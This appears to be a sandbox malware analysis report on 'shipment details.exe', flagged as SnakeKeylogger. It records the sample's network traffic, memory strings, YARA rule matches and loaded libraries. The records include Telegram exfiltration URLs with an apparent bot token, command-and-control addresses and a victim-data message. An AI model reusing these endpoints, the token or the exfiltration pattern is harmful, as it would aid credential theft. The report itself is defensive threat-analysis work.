Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20a |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F92000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects downloader injector Author: ditekSHen |
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520240685.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4522683819.00000000053C0000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs shipment details.exe |
Source: shipment details.exe, 00000000.00000000.2051525359.000000000079A000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000000.00000002.4519226318.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs shipment details.exe |
Source: shipment details.exe, 00000001.00000002.4518256105.0000000000446000.00000040.00000400.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs shipment details.exe |
Source: shipment details.exe, 00000001.00000002.4518425391.0000000000DC7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs shipment details.exe |
Source: shipment details.exe |
Binary or memory string: OriginalFilenameShick.exe, vs shipment details.exe |
Source: 0.2.shipment details.exe.5420000.6.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3b4ad70.4.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.5420000.6.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.2b2a350.0.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: amsi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: msasn1.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: gpapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dwrite.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: textshaping.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: textinputframework.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: coremessaging.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ntmarta.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wintypes.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasapi32.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasman.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rtutils.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dhcpcsvc6.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dhcpcsvc.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dnsapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasadhlp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: secur32.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: schannel.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mskeyprotect.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ntasn1.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ncrypt.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ncryptsslp.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: msasn1.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: gpapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dpapi.dll |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 600000 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599890 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599781 |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599672 |
